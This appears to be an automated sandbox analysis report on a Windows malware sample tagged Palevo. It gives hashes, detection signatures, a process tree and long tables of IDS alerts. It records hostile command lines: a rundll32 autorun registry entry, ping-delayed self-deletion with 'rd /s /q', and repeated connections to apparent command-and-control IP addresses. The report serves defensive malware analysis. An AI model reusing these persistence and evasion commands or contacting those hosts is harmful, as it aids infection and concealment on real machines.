Edit tour

Windows Analysis Report
peks66Iy06.exe

Overview

General Information

Sample name:	peks66Iy06.exe renamed because original name is a hash value
Original sample name:	063ae487b767c03bb51d34f55e4ce21a0f8f11affff4e094939584f82e8ac727.exe
Analysis ID:	1573198
MD5:	0d7cb4c47ae6155162d23073a90daae6
SHA1:	2fcb5c0e99853520ea740a94986882383ce1c3fc
SHA256:	063ae487b767c03bb51d34f55e4ce21a0f8f11affff4e094939584f82e8ac727
Tags:	104-21-50-174exePalevouser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Contains functionality to infect the boot sector

Creates an autostart registry key pointing to binary in C:\Windows

Deletes itself after installation

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries disk data (e.g. SMART data)

Uses known network protocols on non-standard ports

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Abnormal high CPU Usage

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

peks66Iy06.exe (PID: 6344 cmdline: "C:\Users\user\Desktop\peks66Iy06.exe" MD5: 0D7CB4C47AE6155162D23073A90DAAE6)

cmd.exe (PID: 1352 cmdline: cmd.exe /c ping 127.0.0.1 -n 2&c:\nfxboms.exe "C:\Users\user\Desktop\peks66Iy06.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7212 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)

nfxboms.exe (PID: 7272 cmdline: c:\nfxboms.exe "C:\Users\user\Desktop\peks66Iy06.exe" MD5: ACEED05E90B445A035B36096437E8A42)

rundll32.exe (PID: 7292 cmdline: c:\windows\system32\rundll32.exe "c:\ijbbn\gduol.dll",init c:\nfxboms.exe MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7880 cmdline: "C:\windows\SysWOW64\rundll32.exe" "c:\ijbbn\gduol.dll",init MD5: 889B99C52A60DD49227C5E485A016679)

cmd.exe (PID: 7908 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ijbbn" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7988 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)

rundll32.exe (PID: 7280 cmdline: "C:\windows\SysWOW64\rundll32.exe" "c:\ijbbn\gduol.dll",init MD5: 889B99C52A60DD49227C5E485A016679)

cmd.exe (PID: 7200 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ijbbn" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 1240 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)

cleanup

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\SysWOW64\rundll32.exe "c:\ijbbn\gduol.dll",init, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7292, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EvtMgr

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T16:27:07.049104+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49748	202.108.0.52	80	TCP
2024-12-11T16:27:10.303701+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49780	202.108.0.52	80	TCP
2024-12-11T16:27:14.264524+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49822	202.108.0.52	80	TCP
2024-12-11T16:27:19.193651+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49860	202.108.0.52	80	TCP
2024-12-11T16:27:23.244884+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49898	202.108.0.52	80	TCP
2024-12-11T16:27:27.294348+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49938	202.108.0.52	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	55955	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63653	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60510	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56130	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51021	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50965	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	53634	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51931	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50872	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56129	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51164	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51202	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60698	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51783	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51515	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56486	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51717	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63828	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50927	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61400	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	53093	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51790	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60344	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50973	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54065	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60331	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54740	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51554	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	52745	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	53844	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57231	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51555	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60263	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51724	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50623	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50885	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51005	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54937	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	55816	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50945	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54806	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51156	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54328	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57363	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51499	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63468	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63781	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54765	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56123	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57028	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60992	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51441	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57843	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63891	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50865	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57675	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50923	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	53303	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51241	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51185	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50897	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51701	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60382	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60528	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51530	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56120	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	52929	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63372	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	55881	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56326	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51321	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50853	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60163	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63851	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51302	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51037	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58209	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51307	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61625	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	52813	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50984	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56117	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56954	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63392	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60797	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51733	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	64077	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50957	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	55003	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56098	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60939	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51168	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58049	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50850	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51353	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50939	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	55032	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50987	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51165	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61156	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60660	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50966	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54492	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51581	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	55298	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51338	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51225	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51685	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54598	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51012	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50896	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51256	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50838	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56767	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50998	107.163.241.232	12354	TCP
2024-12-11T16:27:06.627467+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49734	107.163.241.232	12354	TCP
2024-12-11T16:27:06.627557+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49735	107.163.241.232	12354	TCP
2024-12-11T16:27:08.382770+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49757	107.163.241.232	12354	TCP
2024-12-11T16:27:08.382833+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49760	107.163.241.232	12354	TCP
2024-12-11T16:27:10.679943+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49777	107.163.241.232	12354	TCP
2024-12-11T16:27:10.815471+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49779	107.163.241.232	12354	TCP
2024-12-11T16:27:12.408916+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49799	107.163.241.232	12354	TCP
2024-12-11T16:27:12.409221+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49796	107.163.241.232	12354	TCP
2024-12-11T16:27:14.644918+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49819	107.163.241.232	12354	TCP
2024-12-11T16:27:14.800806+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49821	107.163.241.232	12354	TCP
2024-12-11T16:27:16.610981+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49838	107.163.241.232	12354	TCP
2024-12-11T16:27:16.611004+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49840	107.163.241.232	12354	TCP
2024-12-11T16:27:19.454941+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49853	107.163.241.232	12354	TCP
2024-12-11T16:27:19.739714+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49859	107.163.241.232	12354	TCP
2024-12-11T16:27:21.428354+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49879	107.163.241.232	12354	TCP
2024-12-11T16:27:21.428417+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49881	107.163.241.232	12354	TCP
2024-12-11T16:27:23.661801+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49895	107.163.241.232	12354	TCP
2024-12-11T16:27:23.769866+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49897	107.163.241.232	12354	TCP
2024-12-11T16:27:25.444014+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49920	107.163.241.232	12354	TCP
2024-12-11T16:27:25.444075+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49917	107.163.241.232	12354	TCP
2024-12-11T16:27:27.674202+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49935	107.163.241.232	12354	TCP
2024-12-11T16:27:27.828872+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49937	107.163.241.232	12354	TCP
2024-12-11T16:27:30.006444+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49952	107.163.241.232	12354	TCP
2024-12-11T16:27:30.550563+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49959	107.163.241.232	12354	TCP
2024-12-11T16:27:31.897999+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49984	107.163.241.232	12354	TCP
2024-12-11T16:27:31.898010+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49975	107.163.241.232	12354	TCP
2024-12-11T16:27:34.129464+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49999	107.163.241.232	12354	TCP
2024-12-11T16:27:34.235463+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50002	107.163.241.232	12354	TCP
2024-12-11T16:27:35.897234+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50029	107.163.241.232	12354	TCP
2024-12-11T16:27:35.897402+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50026	107.163.241.232	12354	TCP
2024-12-11T16:27:38.127664+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50048	107.163.241.232	12354	TCP
2024-12-11T16:27:38.237475+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50051	107.163.241.232	12354	TCP
2024-12-11T16:27:39.912972+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50076	107.163.241.232	12354	TCP
2024-12-11T16:27:39.913107+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50079	107.163.241.232	12354	TCP
2024-12-11T16:27:42.145322+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50097	107.163.241.232	12354	TCP
2024-12-11T16:27:42.284546+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50099	107.163.241.232	12354	TCP
2024-12-11T16:27:43.928362+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50128	107.163.241.232	12354	TCP
2024-12-11T16:27:43.928394+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50126	107.163.241.232	12354	TCP
2024-12-11T16:27:46.159017+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50148	107.163.241.232	12354	TCP
2024-12-11T16:27:46.300044+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50151	107.163.241.232	12354	TCP
2024-12-11T16:27:48.053486+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50179	107.163.241.232	12354	TCP
2024-12-11T16:27:48.053545+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50177	107.163.241.232	12354	TCP
2024-12-11T16:27:50.284179+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50203	107.163.241.232	12354	TCP
2024-12-11T16:27:50.534287+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50205	107.163.241.232	12354	TCP
2024-12-11T16:27:52.212729+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50237	107.163.241.232	12354	TCP
2024-12-11T16:27:52.212767+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50233	107.163.241.232	12354	TCP
2024-12-11T16:27:54.489312+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50247	107.163.241.232	12354	TCP
2024-12-11T16:27:54.863183+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50255	107.163.241.232	12354	TCP
2024-12-11T16:27:56.260934+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50279	107.163.241.232	12354	TCP
2024-12-11T16:27:56.260935+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50285	107.163.241.232	12354	TCP
2024-12-11T16:27:58.597759+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50293	107.163.241.232	12354	TCP
2024-12-11T16:27:58.706758+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50296	107.163.241.232	12354	TCP
2024-12-11T16:28:00.350746+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50328	107.163.241.232	12354	TCP
2024-12-11T16:28:00.350766+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50326	107.163.241.232	12354	TCP
2024-12-11T16:28:02.602771+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50339	107.163.241.232	12354	TCP
2024-12-11T16:28:02.792914+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50342	107.163.241.232	12354	TCP
2024-12-11T16:28:04.524956+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50372	107.163.241.232	12354	TCP
2024-12-11T16:28:04.525020+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50371	107.163.241.232	12354	TCP
2024-12-11T16:28:06.754078+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50390	107.163.241.232	12354	TCP
2024-12-11T16:28:06.925459+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50393	107.163.241.232	12354	TCP
2024-12-11T16:28:09.316693+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50415	107.163.241.232	12354	TCP
2024-12-11T16:28:09.706198+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50422	107.163.241.232	12354	TCP
2024-12-11T16:28:11.178469+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50454	107.163.241.232	12354	TCP
2024-12-11T16:28:11.178527+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50459	107.163.241.232	12354	TCP
2024-12-11T16:28:13.425717+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50464	107.163.241.232	12354	TCP
2024-12-11T16:28:13.539259+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50467	107.163.241.232	12354	TCP
2024-12-11T16:28:15.207629+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50506	107.163.241.232	12354	TCP
2024-12-11T16:28:15.207644+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50509	107.163.241.232	12354	TCP
2024-12-11T16:28:17.441595+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50545	107.163.241.232	12354	TCP
2024-12-11T16:28:17.566055+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50549	107.163.241.232	12354	TCP
2024-12-11T16:28:19.407819+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50603	107.163.241.232	12354	TCP
2024-12-11T16:28:19.407893+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50599	107.163.241.232	12354	TCP
